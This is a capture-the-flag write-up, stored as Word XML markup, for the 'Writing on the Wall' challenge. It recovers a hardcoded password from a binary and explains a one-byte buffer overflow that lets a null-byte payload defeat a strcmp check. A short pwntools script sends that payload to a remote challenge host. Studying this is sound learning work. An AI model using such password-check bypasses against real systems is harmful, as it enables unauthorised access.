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Writing on the Wall</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As you approach a password-protected door, a sense of uncertainty envelops you—no clues, no hints. Yet, just as confusion takes hold, your gaze locks onto cryptic markings adorning the nearby wall. Could this be the elusive password, waiting to unveil the door's secrets?</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You are given a compiled binary file that we need to decompile, during decompiling the file you might find that you need to exploit this file when running it   </w:t>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First downloading the source files. We are given a binary file named ”writing_on_the_wall”. I first opened it with IDA, with it i found a interesting line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">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638675" cy="2695575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect b="0" l="0" r="17035" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="46386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The hexadecimal value [ 0x2073736170743377 ] corresponds to string           [</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssapt3w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] and when reversed  is [ w3tpass ]. We read 7 bytes into local_1e, which is only 6 bytes in size. This means that if we input the string  [w3tpass ], a null byte will be written at the start of local_18.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="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br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:ind w:left="72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0C">
      <w:pPr>
        <w:ind w:left="72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Our goal is to make local_1e equal to local_18, Knowing that the first character of local_18 is a null byte, we can input \x003tpas\x00 to make both strings start with \0.</w:t>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Using Binary Ninja to get a better understanding we see..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:ind w:left="72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457825" cy="264795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578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Looking at this we can get a much better understanding, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strcmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is trying to get the input to equal the local_18 [ var_18 ].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">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 If both are correct the door will open, the destination for the local_18 variable is above it, as the source for the  __builtin_strncpy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">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We will need to run a python script to exploit this to make it easier on us.  As we will need to input null bytes. it's easier and more </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reliable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run a script to print it out properly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa" w:cs="Comfortaa" w:eastAsia="Comfortaa" w:hAnsi="Comfortaa"/>
          <w:b w:val="1"/>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257481</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="21590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59000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">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Using the python Pwntools import i was able to make a Running script that will hopefully give us the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:ind w:left="72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6">
      <w:pPr>
        <w:shd w:fill="1e1e1e" w:val="clear"/>
        <w:spacing w:line="324.00000000000006" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="c586c0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import</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4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:shd w:fill="1e1e1e" w:val="clear"/>
        <w:spacing w:line="324.00000000000006" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="c586c0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import</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4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:shd w:fill="1e1e1e" w:val="clear"/>
        <w:spacing w:line="324.00000000000006" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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569cd6"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">def</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exploit_binary</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9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote_connection</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4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.remote):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">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9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote_connection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.recvuntil(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="ce9178"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;&gt;"</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1B">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9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote_connection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.sendline(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="ce9178"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d7ba7d"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\x00</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="ce9178"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3tpas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d7ba7d"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\x00</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="ce9178"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</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6a9955"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Sending the crafted input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">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9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote_connection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.interactive()  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="6a9955"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Interact with the shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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569cd6"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">def</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establish_connection</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1F">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c586c0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if</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len</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4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sys</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9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">argv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) != </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="b5cea8"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3</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20">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print</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569cd6"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="ce9178"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Usage: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="569cd6"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sys</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9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">argv</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b5cea8"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0</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569cd6"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="ce9178"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> REMOTE remote-ip remote-port"</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21">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4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sys</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dcdcaa"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</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b5cea8"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</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22">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c586c0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">return</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4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.remote(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sys</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9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">argv</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b5cea8"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</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4ec9b0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sys</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9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">argv</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b5cea8"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2</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6a9955"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Establishing remote connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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569cd6"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">def</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main</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25">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9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote_connection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="dcdcaa"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">establish_connection</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6a9955"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Connect to the remote service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">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exploit_binary</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote_connection</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6a9955"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Execute the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:shd w:fill="1e1e1e" w:val="clear"/>
        <w:spacing w:line="324.00000000000006" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="d4d4d4"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Comfortaa SemiBold" w:cs="Comfortaa SemiBold" w:eastAsia="Comfortaa SemiBold" w:hAnsi="Comfortaa SemiBold"/>
          <w:color w:val="c586c0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if</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9cdcfe"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">__name__</w:t>
      </w:r>
